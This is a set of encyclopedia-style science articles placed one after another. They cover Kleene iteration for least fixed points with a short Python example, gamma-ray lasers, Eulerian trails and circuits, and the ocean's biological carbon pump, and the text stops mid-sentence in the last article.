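The partial-function dcpo described in the examples also gives the standard concrete picture of least fixed points. As a minimal sketch (our own illustration, not taken from the article's references), the following Python snippet performs Kleene iteration from the least element (the nowhere-defined partial function) for the functional F(f)(n) = 1 if n = 0, else n·f(n − 1); each iterate extends the previous one, and the supremum of the chain is the factorial function:

```python
def F(f):
    """One application of the functional; f is a dict encoding a partial
    function on the naturals (absent keys mean "undefined")."""
    g = {0: 1}                      # F(f) is always defined at 0
    for n, value in f.items():      # and at n + 1 wherever f is defined at n
        g[n + 1] = (n + 1) * value
    return g

f = {}                              # bottom: the nowhere-defined function
for k in range(5):
    print(f"f_{k} = {f}")           # f_k is defined exactly on {0, ..., k-1}
    f = F(f)
```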
Complete partial order
Mathematics
1,490
49,326,597
https://en.wikipedia.org/wiki/Gamma-ray%20laser
A gamma-ray laser, or graser, is a hypothetical device that would produce coherent gamma rays, just as an ordinary laser produces coherent rays of visible light. Potential applications for gamma-ray lasers include medical imaging, spacecraft propulsion, and cancer treatment. In his 2003 Nobel lecture, Vitaly Ginzburg cited the gamma-ray laser as one of the 30 most important problems in physics. The effort to construct a practical gamma-ray laser is interdisciplinary, encompassing quantum mechanics, nuclear and optical spectroscopy, chemistry, solid-state physics, and metallurgy—as well as the generation, moderation, and interaction of neutrons—and involves specialized knowledge and research in all these fields. The subject involves both basic science and engineering technology. Research The problem of obtaining a sufficient concentration of resonant excited (isomeric) nuclear states for collective stimulated emission to occur turns on the broadening of the gamma-ray spectral line. Of the two forms of broadening, homogeneous broadening is the result of the lifetime of the isomeric state: the shorter the lifetime, the more broadened the line. Inhomogeneous broadening comprises all mechanisms by which the homogeneously broadened line is spread over the spectrum. The most familiar inhomogeneous broadening is Doppler recoil broadening from thermal motion of molecules in the solid containing the excited isomer and recoil from gamma-ray emission, in which the emission spectrum is both shifted and broadened. Isomers in solids can emit a sharp component superimposed on the Doppler-broadened background; this is called the Mössbauer effect. This recoilless radiation exhibits a sharp line on top of the Doppler-broadened background that is only slightly shifted from the center of the background. With the inhomogeneous background removed, and a sharp line, it would seem that we have the conditions for gain. But other difficulties that would degrade gain are unexcited states that would resonantly absorb the radiation, opaque impurities, and loss in propagation through the crystal in which the active nuclei are embedded. Much of the latter can be overcome by clever matrix crystal alignment to exploit the transparency provided by the Borrmann effect. Another difficulty, the graser dilemma, is that properties that should enable gain and those that would permit sufficient nuclear inversion density seem incompatible. The time required to activate, separate, concentrate, and crystallize an appreciable number of excited nuclei by conventional radiochemistry is at least a few seconds. To ensure the inversion persists, the lifetime of the excited state must be considerably longer. Furthermore, the heating that would result from neutron-pumping the inversion in situ seems incompatible with maintaining the Mössbauer effect, although there are still avenues to explore. Heating may be reduced by two-stage neutron-gamma pumping, in which neutron capture occurs in a parent-doped converter, where it generates Mössbauer radiation that is then absorbed by ground-state nuclei in the graser. Two-stage pumping of multiple levels offers multiple advantages. Another approach is to use nuclear transitions driven by collective electron oscillations. The scheme would employ a triad of isomeric states: a long-lived storage state, in addition to an upper and lower lasing state. 
The storage state would be energetically close to the short-lived upper lasing state but separated by a forbidden transition involving one quantum unit of spin angular momentum. The graser would be enabled by a very intense optical laser to slosh the electron cloud back and forth and saturate the forbidden transition in the near field of the cloud. The population of the storage state would then be quickly equalized with the upper lasing state whose transition to the lower lasing state would be both spontaneous and stimulated by resonant gamma radiation. A "complete" chart of nuclides likely contains a very large number of isomeric states, and the existence of such a triad seems likely, but it has yet to be found. Nonlinearities can result in both spatial and temporal harmonics in the near field at the nucleus, opening the range of possibilities for rapid transfer from the storage state to the upper lasing state using other kinds of triads involving transition energies at multiples of the optical laser quantum energy and at higher multipolarities. See also Particle-induced gamma emission References Further reading Balko, B.; Cohen, L.; Sparrow, D. A.; eds. (1989). Gamma-Ray Lasers. Pergamon. http://www.sciencedirect.com/science/book/9780080370156 Provides a definitive overview of the current status of gamma-ray lasers. A review for laymen. Laser types Gamma rays Hypothetical technology
Gamma-ray laser
Physics
971
333,219
https://en.wikipedia.org/wiki/Eulerian%20path
In graph theory, an Eulerian trail (or Eulerian path) is a trail in a finite graph that visits every edge exactly once (allowing for revisiting vertices). Similarly, an Eulerian circuit or Eulerian cycle is an Eulerian trail that starts and ends on the same vertex. They were first discussed by Leonhard Euler while solving the famous Seven Bridges of Königsberg problem in 1736. The problem can be stated mathematically like this: Given the graph in the image, is it possible to construct a path (or a cycle; i.e., a path starting and ending on the same vertex) that visits each edge exactly once? Euler proved that a necessary condition for the existence of Eulerian circuits is that all vertices in the graph have an even degree, and stated without proof that connected graphs with all vertices of even degree have an Eulerian circuit. The first complete proof of this latter claim was published posthumously in 1873 by Carl Hierholzer. This is known as Euler's Theorem: A connected graph has an Euler cycle if and only if every vertex has an even number of incident edges. The term Eulerian graph has two common meanings in graph theory. One meaning is a graph with an Eulerian circuit, and the other is a graph with every vertex of even degree. These definitions coincide for connected graphs. For the existence of Eulerian trails it is necessary that zero or two vertices have an odd degree; this means the Königsberg graph is not Eulerian. If there are no vertices of odd degree, all Eulerian trails are circuits. If there are exactly two vertices of odd degree, all Eulerian trails start at one of them and end at the other. A graph that has an Eulerian trail but not an Eulerian circuit is called semi-Eulerian. Definition An Eulerian trail, or Euler walk, in an undirected graph is a walk that uses each edge exactly once. If such a walk exists, the graph is called traversable or semi-eulerian. An Eulerian cycle, also called an Eulerian circuit or Euler tour, in an undirected graph is a cycle that uses each edge exactly once. If such a cycle exists, the graph is called Eulerian or unicursal. The term "Eulerian graph" is also sometimes used in a weaker sense to denote a graph where every vertex has even degree. For finite connected graphs the two definitions are equivalent, while a possibly unconnected graph is Eulerian in the weaker sense if and only if each connected component has an Eulerian cycle. For directed graphs, "path" has to be replaced with directed path and "cycle" with directed cycle. The definition and properties of Eulerian trails, cycles and graphs are valid for multigraphs as well. An Eulerian orientation of an undirected graph G is an assignment of a direction to each edge of G such that, at each vertex v, the indegree of v equals the outdegree of v. Such an orientation exists for any undirected graph in which every vertex has even degree, and may be found by constructing an Euler tour in each connected component of G and then orienting the edges according to the tour. Every Eulerian orientation of a connected graph is a strong orientation, an orientation that makes the resulting directed graph strongly connected. Properties An undirected graph has an Eulerian cycle if and only if every vertex has even degree, and all of its vertices with nonzero degree belong to a single connected component. An undirected graph can be decomposed into edge-disjoint cycles if and only if all of its vertices have even degree. 
So, a graph has an Eulerian cycle if and only if it can be decomposed into edge-disjoint cycles and its nonzero-degree vertices belong to a single connected component. An undirected graph has an Eulerian trail if and only if exactly zero or two vertices have odd degree, and all of its vertices with nonzero degree belong to a single connected component. A directed graph has an Eulerian cycle if and only if every vertex has equal in-degree and out-degree, and all of its vertices with nonzero degree belong to a single strongly connected component. Equivalently, a directed graph has an Eulerian cycle if and only if it can be decomposed into edge-disjoint directed cycles and all of its vertices with nonzero degree belong to a single strongly connected component. A directed graph has an Eulerian trail if and only if at most one vertex has out-degree exceeding in-degree by one, at most one vertex has in-degree exceeding out-degree by one, every other vertex has equal in-degree and out-degree, and all of its vertices with nonzero degree belong to a single connected component of the underlying undirected graph. Constructing Eulerian trails and circuits Fleury's algorithm Fleury's algorithm is an elegant but inefficient algorithm that dates to 1883. Consider a graph known to have all edges in the same component and at most two vertices of odd degree. The algorithm starts at a vertex of odd degree, or, if the graph has none, it starts with an arbitrarily chosen vertex. At each step it chooses the next edge in the path to be one whose deletion would not disconnect the graph, unless there is no such edge, in which case it picks the remaining edge left at the current vertex. It then moves to the other endpoint of that edge and deletes the edge. At the end of the algorithm there are no edges left, and the sequence from which the edges were chosen forms an Eulerian cycle if the graph has no vertices of odd degree, or an Eulerian trail if there are exactly two vertices of odd degree. While the graph traversal in Fleury's algorithm is linear in the number of edges, i.e. O(|E|), we also need to factor in the complexity of detecting bridges. If we are to re-run Tarjan's linear time bridge-finding algorithm after the removal of every edge, Fleury's algorithm will have a time complexity of O(|E|²). A dynamic bridge-finding algorithm of Thorup (2000) allows this to be improved to O(|E| log³|E| log log |E|), but this is still significantly slower than alternative algorithms. Hierholzer's algorithm Hierholzer's 1873 paper provides a different method for finding Euler cycles that is more efficient than Fleury's algorithm: Choose any starting vertex v, and follow a trail of edges from that vertex until returning to v. It is not possible to get stuck at any vertex other than v, because the even degree of all vertices ensures that, when the trail enters another vertex w, there must be an unused edge leaving w. The tour formed in this way is a closed tour, but may not cover all the vertices and edges of the initial graph. As long as there exists a vertex u that belongs to the current tour but that has adjacent edges not part of the tour, start another trail from u, following unused edges until returning to u, and join the tour formed in this way to the previous tour. Since we assume the original graph is connected, repeating the previous step will exhaust all edges of the graph, as implemented in the sketch below. 
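The tour-merging idea can be implemented with an explicit stack rather than literal trail splicing. The following minimal Python sketch is our own illustration (not from Hierholzer's paper; names are hypothetical); it returns an Eulerian circuit of a non-empty connected undirected multigraph in which every vertex has even degree, in O(|E|) time:

```python
from collections import defaultdict

def hierholzer(edges):
    """Return an Eulerian circuit as a list of vertices, assuming the graph
    is connected, non-empty, and every vertex has even degree."""
    adj = defaultdict(list)            # vertex -> list of (neighbor, edge id)
    for eid, (u, v) in enumerate(edges):
        adj[u].append((v, eid))
        adj[v].append((u, eid))
    used = [False] * len(edges)
    stack, circuit = [edges[0][0]], []
    while stack:
        v = stack[-1]
        # Discard edges already traversed from their other endpoint.
        while adj[v] and used[adj[v][-1][1]]:
            adj[v].pop()
        if adj[v]:                     # extend the current trail
            w, eid = adj[v].pop()
            used[eid] = True
            stack.append(w)
        else:                          # v is exhausted: emit it to the circuit
            circuit.append(stack.pop())
    return circuit[::-1]

# Example: two triangles sharing vertex 0.
print(hierholzer([(0, 1), (1, 2), (2, 0), (0, 3), (3, 4), (4, 0)]))
```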
By using a data structure such as a doubly linked list to maintain the set of unused edges incident to each vertex, to maintain the list of vertices on the current tour that have unused edges, and to maintain the tour itself, the individual operations of the algorithm (finding unused edges exiting each vertex, finding a new starting vertex for a tour, and connecting two tours that share a vertex) may be performed in constant time each, so the overall algorithm takes linear time, O(|E|). This algorithm may also be implemented with a deque. Because it is only possible to get stuck when the deque represents a closed tour, one should rotate the deque by removing edges from the tail and adding them to the head until unstuck, and then continue until all edges are accounted for. This also takes linear time, as the number of rotations performed is never larger than |E| (intuitively, any "bad" edges are moved to the head, while fresh edges are added to the tail). Counting Eulerian circuits Complexity issues The number of Eulerian circuits in digraphs can be calculated using the so-called BEST theorem, named after de Bruijn, van Aardenne-Ehrenfest, Smith and Tutte. The formula states that the number of Eulerian circuits in a digraph is the product of certain degree factorials and the number of rooted arborescences. The latter can be computed as a determinant, by the matrix tree theorem, giving a polynomial time algorithm. The BEST theorem was first stated in this form in a "note added in proof" to the van Aardenne-Ehrenfest and de Bruijn paper (1951). The original proof was bijective and generalized the de Bruijn sequences. It is a variation on an earlier result by Smith and Tutte (1941). Counting the number of Eulerian circuits on undirected graphs is much more difficult. This problem is known to be #P-complete. In a positive direction, a Markov chain Monte Carlo approach, via the Kotzig transformations (introduced by Anton Kotzig in 1968), is believed to give a sharp approximation for the number of Eulerian circuits in a graph, though as yet there is no proof of this fact (even for graphs of bounded degree). Special cases An asymptotic formula for the number of Eulerian circuits in the complete graphs was determined by McKay and Robinson (1995). A similar formula was later obtained by M.I. Isaev (2009) for complete bipartite graphs. Applications Eulerian trails are used in bioinformatics to reconstruct the DNA sequence from its fragments. They are also used in CMOS circuit design to find an optimal logic gate ordering. There are some algorithms for processing trees that rely on an Euler tour of the tree (where each edge is treated as a pair of arcs). The de Bruijn sequences can be constructed as Eulerian trails of de Bruijn graphs. In infinite graphs In an infinite graph, the corresponding concept to an Eulerian trail or Eulerian cycle is an Eulerian line, a doubly-infinite trail that covers all of the edges of the graph. It is not sufficient for the existence of such a trail that the graph be connected and that all vertex degrees be even; for instance, the infinite Cayley graph shown, with all vertex degrees equal to four, has no Eulerian line. The infinite graphs that contain Eulerian lines were characterized by Erdős, Grünwald and Vázsonyi (1938). For an infinite graph or multigraph G to have an Eulerian line, it is necessary and sufficient that all of the following conditions be met: G is connected. G has countable sets of vertices and edges. G has no vertices of (finite) odd degree. 
Removing any finite subgraph S from G leaves at most two infinite connected components in the remaining graph, and if S has even degree at each of its vertices then removing S leaves exactly one infinite connected component. Undirected Eulerian graphs Euler stated, as a necessary condition for a finite graph to be Eulerian, that all vertices must have even degree. Hierholzer proved this is a sufficient condition in a paper published in 1873. This leads to the following necessary and sufficient condition for a finite graph to be Eulerian: An undirected connected finite graph G is Eulerian if and only if every vertex of G has even degree. The following result was proved by Veblen in 1912: An undirected connected graph is Eulerian if and only if it is the disjoint union of some cycles. Hierholzer developed a linear time algorithm for constructing an Eulerian tour in an undirected graph. Directed Eulerian graphs It is possible to have a directed graph that has all even out-degrees but is not Eulerian. Since an Eulerian circuit leaves a vertex the same number of times as it enters that vertex, a necessary condition for an Eulerian circuit to exist is that the in-degree and out-degree are equal at each vertex. Obviously, connectivity is also necessary. König proved that these conditions are also sufficient. That is, a directed graph is Eulerian if and only if it is connected and the in-degree and out-degree are equal at each vertex. In this theorem it doesn't matter whether "connected" means "weakly connected" or "strongly connected" since they are equivalent for Eulerian graphs. Hierholzer's linear time algorithm for constructing an Eulerian tour is also applicable to directed graphs. Mixed Eulerian graphs All mixed graphs that are both even and symmetric are guaranteed to be Eulerian. However, this is not a necessary condition, as it is possible to construct a non-symmetric, even graph that is Eulerian. Ford and Fulkerson proved in 1962 in their book Flows in Networks a necessary and sufficient condition for a graph to be Eulerian, viz., that every vertex must be even and satisfy the balance condition, i.e. for every subset of vertices S, the difference between the number of arcs leaving S and entering S must be less than or equal to the number of edges incident with S. The process of checking if a mixed graph is Eulerian is harder than checking if an undirected or directed graph is Eulerian because the balanced set condition concerns every possible subset of vertices. See also Eulerian matroid, an abstract generalization of Eulerian graphs Five room puzzle Handshaking lemma, proven by Euler in his original paper, showing that any undirected connected graph has an even number of odd-degree vertices Hamiltonian path – a path that visits each vertex exactly once. Route inspection problem, search for the shortest path that visits all edges, possibly repeating edges if an Eulerian path does not exist. Veblen's theorem, which states that graphs with even vertex degree can be partitioned into edge-disjoint cycles regardless of their connectivity Notes References Bibliography Euler, L., "Solutio problematis ad geometriam situs pertinentis", Comment. Academiae Sci. I. Petropolitanae 8 (1736), 128–140. Lucas, E., Récréations Mathématiques IV, Paris, 1921. Fleury, "Deux problemes de geometrie de situation", Journal de mathematiques elementaires (1883), 257–261. T. van Aardenne-Ehrenfest and N. G. de Bruijn (1951) "Circuits and trees in oriented linear graphs", Simon Stevin 28: 203–217. 
W. T. Tutte and C. A. B. Smith (1941) "On Unicursal Paths in a Network of Degree 4", American Mathematical Monthly 48: 233–237. External links Discussion of early mentions of Fleury's algorithm. Euler tour at Encyclopedia of Mathematics. Graph theory objects Leonhard Euler
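The even-degree test and Hierholzer's linear-time tour construction described above are compact enough to sketch in code. The following Python fragment is a minimal illustration written for this article, not taken from any cited source; the edge-list representation and the function names are invented for the example.

from collections import defaultdict

def is_eulerian(edges):
    # Euler's condition for a connected undirected graph:
    # every vertex must have even degree.
    degree = defaultdict(int)
    for u, v in edges:
        degree[u] += 1
        degree[v] += 1
    return all(d % 2 == 0 for d in degree.values())

def hierholzer_circuit(edges):
    # Hierholzer's method: follow unused edges until the trail closes,
    # then splice in sub-tours from vertices on the trail that still
    # have unused edges. Each edge is handled a constant number of
    # times, so the construction runs in linear time.
    adj = defaultdict(list)
    for i, (u, v) in enumerate(edges):
        adj[u].append((v, i))
        adj[v].append((u, i))
    used = [False] * len(edges)
    stack, circuit = [edges[0][0]], []
    while stack:
        v = stack[-1]
        while adj[v] and used[adj[v][-1][1]]:
            adj[v].pop()                 # discard already-traversed edges
        if adj[v]:
            w, i = adj[v].pop()
            used[i] = True
            stack.append(w)              # extend the current trail
        else:
            circuit.append(stack.pop())  # vertex exhausted: back up
    return circuit[::-1]

edges = [(0, 1), (1, 2), (2, 0), (0, 3), (3, 4), (4, 0)]  # two triangles sharing vertex 0
assert is_eulerian(edges)
print(hierholzer_circuit(edges))  # one valid closed trail, e.g. [0, 4, 3, 0, 2, 1, 0]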
Eulerian path
Mathematics
3,156
240,228
https://en.wikipedia.org/wiki/Biological%20pump
The biological pump (or ocean carbon biological pump or marine biological carbon pump) is the ocean's biologically driven sequestration of carbon from the atmosphere and land runoff to the ocean interior and seafloor sediments. In other words, it is a biologically mediated process which results in the sequestering of carbon in the deep ocean away from the atmosphere and the land. The biological pump is the biological component of the "marine carbon pump", which comprises both a physical and a biological component. It is the part of the broader oceanic carbon cycle responsible for the cycling of organic matter formed mainly by phytoplankton during photosynthesis (soft-tissue pump), as well as the cycling of calcium carbonate (CaCO3) formed into shells by certain organisms such as plankton and mollusks (carbonate pump). Budget calculations of the biological carbon pump are based on the ratio between sedimentation (carbon export to the ocean floor) and remineralization (release of carbon to the atmosphere). The biological pump is not so much the result of a single process, but rather the sum of a number of processes, each of which can influence biological pumping. Overall, the pump transfers about 10.2 gigatonnes of carbon into the ocean's interior every year and holds a cumulative total of about 1,300 gigatonnes of carbon, corresponding to an average storage time of roughly 127 years (10.2 Gt C yr−1 × 127 yr ≈ 1,300 Gt C). This takes carbon out of contact with the atmosphere for several thousand years or longer. An ocean without a biological pump would result in atmospheric carbon dioxide levels about 400 ppm higher than the present day. Overview The element carbon plays a central role in climate and life on Earth. It is capable of moving among and between the geosphere, cryosphere, atmosphere, biosphere and hydrosphere. This flow of carbon is referred to as the Earth's carbon cycle. It is also intimately linked to the cycling of other elements and compounds. The ocean plays a fundamental role in Earth's carbon cycle, helping to regulate atmospheric CO2 concentration. The biological pump is a set of processes that transfer organic carbon from the surface to the deep ocean, and is at the heart of the ocean carbon cycle. The biological pump depends on the fraction of primary produced organic matter that survives degradation in the euphotic zone and that is exported from surface water to the ocean interior, where it is mineralized to inorganic carbon, with the result that carbon is transported against the gradient of dissolved inorganic carbon (DIC) from the surface to the deep ocean. This transfer occurs through physical mixing and transport of dissolved and particulate organic carbon (POC), vertical migrations of organisms (zooplankton, fish) and through gravitational settling of particulate organic carbon. The biological pump can be divided into three distinct phases, the first of which is the production of fixed carbon by planktonic phototrophs in the euphotic (sunlit) surface region of the ocean. In these surface waters, phytoplankton use carbon dioxide (CO2), nitrogen (N), phosphorus (P), and other trace elements (barium, iron, zinc, etc.) during photosynthesis to make carbohydrates, lipids, and proteins. Some plankton (e.g. coccolithophores and foraminifera) combine calcium (Ca) and dissolved carbonates (carbonic acid and bicarbonate) to form a calcium carbonate (CaCO3) protective coating.
Once this carbon is fixed into soft or hard tissue, the organisms either remain in the euphotic zone to be recycled as part of the regenerative nutrient cycle or, once they die, continue to the second phase of the biological pump and begin to sink to the ocean floor. The sinking particles often form aggregates as they sink, which greatly increases the sinking rate. It is this aggregation that gives particles a better chance of escaping predation and decomposition in the water column and eventually making it to the sea floor. The fixed carbon that is decomposed by bacteria either on the way down or once on the sea floor then enters the final phase of the pump and is remineralized to be used again in primary production. The particles that escape these processes entirely are sequestered in the sediment and may remain there for millions of years. It is this sequestered carbon that is responsible for ultimately lowering atmospheric CO2. Biology, physics and gravity interact to pump organic carbon into the deep sea. The processes of fixation of inorganic carbon in organic matter during photosynthesis, its transformation by food web processes (trophodynamics), physical mixing, transport and gravitational settling are referred to collectively as the biological pump. The biological pump is responsible for transforming dissolved inorganic carbon (DIC) into organic biomass and pumping it in particulate or dissolved form into the deep ocean. Inorganic nutrients and carbon dioxide are fixed during photosynthesis by phytoplankton, which both release dissolved organic matter (DOM) and are consumed by herbivorous zooplankton. Larger zooplankton, such as copepods, egest fecal pellets which can be reingested and sink or collect with other organic detritus into larger, more-rapidly-sinking aggregates. DOM is partially consumed by bacteria and respired; the remaining refractory DOM is advected and mixed into the deep sea. DOM and aggregates exported into the deep water are consumed and respired, thus returning organic carbon into the enormous deep ocean reservoir of DIC. About 1% of the particles leaving the surface ocean reach the seabed and are consumed, respired, or buried in the sediments. There, carbon is stored for millions of years. The net effect of these processes is to remove carbon in organic form from the surface and return it to DIC at greater depths, maintaining the surface-to-deep ocean gradient of DIC. Thermohaline circulation returns deep-ocean DIC to the atmosphere on millennial timescales. Primary production The first step in the biological pump is the synthesis of both organic and inorganic carbon compounds by phytoplankton in the uppermost, sunlit layers of the ocean. Organic compounds in the form of sugars, carbohydrates, lipids, and proteins are synthesized during the process of photosynthesis: CO2 + H2O + light → CH2O + O2 In addition to carbon, organic matter found in phytoplankton is composed of nitrogen, phosphorus and various trace metals. The ratio of carbon to nitrogen and phosphorus varies from place to place, but has an average ratio near 106C:16N:1P, known as the Redfield ratio. Trace metals such as magnesium, cadmium, iron, calcium, barium and copper are orders of magnitude less prevalent in phytoplankton organic material, but necessary for certain metabolic processes and therefore can be limiting nutrients in photosynthesis due to their lower abundance in the water column.
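As a quick worked illustration of the Redfield ratio quoted above, the following Python lines convert a hypothetical amount of fixed carbon into the nitrogen and phosphorus demand it implies; the input figure is arbitrary and chosen only for the example.

# Redfield ratio, 106 C : 16 N : 1 P by moles, as quoted in the text.
c_fixed_mol = 106e6                 # hypothetical carbon fixation, moles

n_demand = c_fixed_mol * 16 / 106   # moles of nitrogen required
p_demand = c_fixed_mol * 1 / 106    # moles of phosphorus required

print(f"N demand: {n_demand:.3g} mol, P demand: {p_demand:.3g} mol")
# N demand: 1.6e+07 mol, P demand: 1e+06 mol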
Oceanic primary production accounts for about half of the carbon fixation carried out on Earth. Approximately 50–60 Pg of carbon are fixed by marine phytoplankton each year despite the fact that they account for less than 1% of the total photosynthetic biomass on Earth. The majority of this carbon fixation (~80%) is carried out in the open ocean, while the remaining amount occurs in the very productive upwelling regions of the ocean. Despite these productive regions producing 2 to 3 times as much fixed carbon per area, the open ocean accounts for greater than 90% of the ocean area and therefore is the larger contributor. Forms of carbon Dissolved and particulate carbon Phytoplankton support all life in the ocean as they convert inorganic compounds into organic constituents. This autotrophically produced biomass forms the foundation of the marine food web. In the diagram immediately below, the arrows indicate the various production (arrowhead pointing toward DOM pool) and removal processes of DOM (arrowhead pointing away), while the dashed arrows represent dominant biological processes involved in the transfer of DOM. Due to these processes, the fraction of labile DOM decreases rapidly with depth, whereas the refractory character of the DOM pool considerably increases during its export to the deep ocean. DOM, dissolved organic matter. Ocean carbon pools The marine biological pump depends on a number of key pools, components and processes that influence its functioning. There are four main pools of carbon in the ocean. Dissolved inorganic carbon (DIC) is the largest pool. It constitutes around 38,000 Pg C and includes dissolved carbon dioxide (CO2), bicarbonate (HCO3−), carbonate (CO32−), and carbonic acid (H2CO3). The equilibrium between carbonic acid and carbonate determines the pH of the seawater. Carbon dioxide dissolves easily in water and its solubility is inversely related to temperature. Dissolved CO2 is taken up in the process of photosynthesis, and this can reduce the partial pressure of CO2 in the seawater, favouring drawdown from the atmosphere. The reverse process, respiration, releases CO2 back into the water and can increase the partial pressure of CO2 in the seawater, favouring release back to the atmosphere. The formation of calcium carbonate by organisms such as coccolithophores has the effect of releasing CO2 into the water. Dissolved organic carbon (DOC) is the next largest pool at around 662 Pg C. DOC can be classified according to its reactivity as refractory, semi-labile or labile. The labile pool constitutes around 0.2 Pg C, is bioavailable, and has a high production rate (~15–25 Pg C y−1). The refractory component is the biggest pool (~642 ± 32 Pg C), but has a very low turnover rate (0.043 Pg C y−1). The turnover time for refractory DOC is thought to be greater than 1000 years (indeed, dividing the pool size by the flux, 642 Pg C / 0.043 Pg C y−1, gives roughly 15,000 years). Particulate organic carbon (POC) constitutes around 2.3 Pg C, and is relatively small compared with DIC and DOC. Though small in size, this pool is highly dynamic, having the highest turnover rate of any organic carbon pool on the planet. Driven by primary production, it produces around 50 Pg C y−1 globally. It can be separated into living (e.g. phytoplankton, zooplankton, bacteria) and non-living (e.g. detritus) material. Of these, the phytoplankton carbon is particularly important because of its role in marine primary production, and also because it serves as the food resource for all the larger organisms in the pelagic ecosystem. Particulate inorganic carbon (PIC) is the smallest of the pools at around 0.03 Pg C.
It is present in the form of calcium carbonate (CaCO3) in particulate form, and impacts the carbonate system and pH of the seawater. Estimates for PIC production are in the region of 0.8–1.4 Pg C y−1, with at least 65% of it being dissolved in the upper water column and the rest contributing to deep sediments. Coccolithophores and foraminifera are estimated to be the dominant sources of PIC in the open ocean. The PIC pool is of particular importance due to its role in the ocean carbonate system, and in facilitating the export of carbon to the deep ocean through the carbonate pump, whereby PIC is exported out of the photic zone and deposited in the bottom sediments. Calcium carbonate Particulate inorganic carbon (PIC) usually takes the form of calcium carbonate (CaCO3), and plays a key part in the ocean carbon cycle. This biologically fixed carbon is used as a protective coating for many planktonic species (coccolithophores, foraminifera) as well as larger marine organisms (mollusk shells). Calcium carbonate is also excreted at high rates during osmoregulation by fish, and can form in whiting events. While this form of carbon is not directly taken from the atmospheric budget, it is formed from dissolved forms of carbonate which are in equilibrium with CO2 and then responsible for removing this carbon via sequestration. CO2 + H2O → H2CO3 → H+ + HCO3− Ca2+ + 2HCO3− → CaCO3 + CO2 + H2O While this process does manage to fix a large amount of carbon, two units of alkalinity are sequestered for every unit of sequestered carbon. The formation and sinking of CaCO3 therefore drives a surface to deep alkalinity gradient which serves to lower the pH of surface waters, shifting the speciation of dissolved carbon to raise the partial pressure of dissolved CO2 in surface waters, which actually raises atmospheric levels. In addition, the burial of CaCO3 in sediments serves to lower overall oceanic alkalinity, tending to raise atmospheric CO2 levels if not counterbalanced by the new input of alkalinity from weathering. The portion of carbon that is permanently buried at the sea floor becomes part of the geologic record. Calcium carbonate often forms remarkable deposits that can then be raised onto land through tectonic motion, as is the case with the White Cliffs of Dover in Southern England. These cliffs are made almost entirely of the plates of buried coccolithophores. Oceanic carbon cycle Three main processes (or pumps) that make up the marine carbon cycle bring atmospheric carbon dioxide (CO2) into the ocean interior and distribute it through the oceans. These three pumps are: (1) the solubility pump, (2) the carbonate pump, and (3) the biological pump. The total active pool of carbon at the Earth's surface for durations of less than 10,000 years is roughly 40,000 gigatons C (Gt C, a gigaton is one billion tons, or the weight of approximately 6 million blue whales), and about 95% (~38,000 Gt C) is stored in the ocean, mostly as dissolved inorganic carbon. The speciation of dissolved inorganic carbon in the marine carbon cycle is a primary controller of acid-base chemistry in the oceans. Solubility pump The biological pump is accompanied by a physico-chemical counterpart known as the solubility pump. This pump transports significant amounts of carbon in the form of dissolved inorganic carbon (DIC) from the ocean's surface to its interior. It involves physical and chemical processes only, and does not involve biological processes.
The solubility pump is driven by the coincidence of two processes in the ocean: The solubility of carbon dioxide is a strong inverse function of seawater temperature (i.e. solubility is greater in cooler water) The thermohaline circulation is driven by the formation of deep water at high latitudes where seawater is usually cooler and denser Since deep water (that is, seawater in the ocean's interior) is formed under the same surface conditions that promote carbon dioxide solubility, it contains a higher concentration of dissolved inorganic carbon than might be expected from average surface concentrations. Consequently, these two processes act together to pump carbon from the atmosphere into the ocean's interior. One consequence of this is that when deep water upwells in warmer, equatorial latitudes, it strongly outgasses carbon dioxide to the atmosphere because of the reduced solubility of the gas. Carbonate pump The carbonate pump is sometimes referred to as the "hard tissue" component of the biological pump. Some surface marine organisms, like coccolithophores, produce hard structures out of calcium carbonate, a form of particulate inorganic carbon, by fixing bicarbonate. This fixation of DIC is an important part of the oceanic carbon cycle. Ca2+ + 2 HCO3− → CaCO3 + CO2 + H2O While the biological carbon pump fixes inorganic carbon (CO2) into particulate organic carbon in the form of sugar (C6H12O6), the carbonate pump fixes inorganic bicarbonate and causes a net release of CO2. In this way, the carbonate pump could be termed the carbonate counter pump. It works counter to the biological pump by counteracting the CO2 flux into the biological pump. Continental shelf pump The continental shelf pump is proposed as operating in the shallow waters of the continental shelves as a mechanism transporting carbon (dissolved or particulate) from the continental waters to the interior of the adjacent deep ocean. As originally formulated, the pump is thought to occur where the solubility pump interacts with cooler, and therefore denser, water from the shelf floor which feeds down the continental slope into the neighbouring deep ocean. The shallowness of the continental shelf restricts the convection of cooling water, so the cooling can be greater for continental shelf waters than for neighbouring open ocean waters. These cooler waters promote the solubility pump and lead to an increased storage of dissolved inorganic carbon. This extra carbon storage is further augmented by the increased biological production characteristic of shelves. The dense, carbon-rich shelf waters then sink to the shelf floor and enter the sub-surface layer of the open ocean via isopycnal mixing. As the sea level rises in response to global warming, the surface area of the shelf seas will grow and in consequence the strength of the shelf sea pump should increase. Processes in the biological pump In the diagram on the right, phytoplankton convert CO2, which has dissolved from the atmosphere into the surface oceans (90 Gt yr−1), into particulate organic carbon (POC) during primary production (~50 Gt C yr−1). Phytoplankton are then consumed by copepods, krill and other small zooplankton grazers, which in turn are preyed upon by higher trophic levels. Any unconsumed phytoplankton form aggregates, and along with zooplankton faecal pellets, sink rapidly and are exported out of the mixed layer (<12 Gt C yr−1).
Krill, copepods, zooplankton and microbes intercept phytoplankton in the surface ocean and sinking detrital particles at depth, consuming and respiring this POC to CO2 (dissolved inorganic carbon, DIC), such that only a small proportion of surface-produced carbon sinks to the deep ocean (i.e., depths > 1000 m). As krill and smaller zooplankton feed, they also physically fragment particles into small, slower- or non-sinking pieces (via sloppy feeding, coprorhexy if fragmenting faeces), retarding POC export. This releases dissolved organic carbon (DOC) either directly from cells or indirectly via bacterial solubilisation. Bacteria can then remineralise the DOC to DIC (CO2, microbial gardening). The biological carbon pump is one of the chief determinants of the vertical distribution of carbon in the oceans and therefore of the surface partial pressure of CO2 governing air-sea CO2 exchange. It comprises phytoplankton cells, their consumers and the bacteria that assimilate their waste, and plays a central role in the global carbon cycle by delivering carbon from the atmosphere to the deep sea, where it is concentrated and sequestered for centuries. Photosynthesis by phytoplankton lowers the partial pressure of CO2 in the upper ocean, thereby facilitating the absorption of CO2 from the atmosphere by generating a steeper CO2 gradient. It also results in the formation of particulate organic carbon (POC) in the euphotic layer of the epipelagic zone (0–200 m depth). The POC is processed by microbes, zooplankton and their consumers into fecal pellets, organic aggregates ("marine snow") and other forms, which are thereafter exported to the mesopelagic (200–1000 m depth) and bathypelagic zones by sinking and vertical migration by zooplankton and fish. Although primary production includes both dissolved and particulate organic carbon (DOC 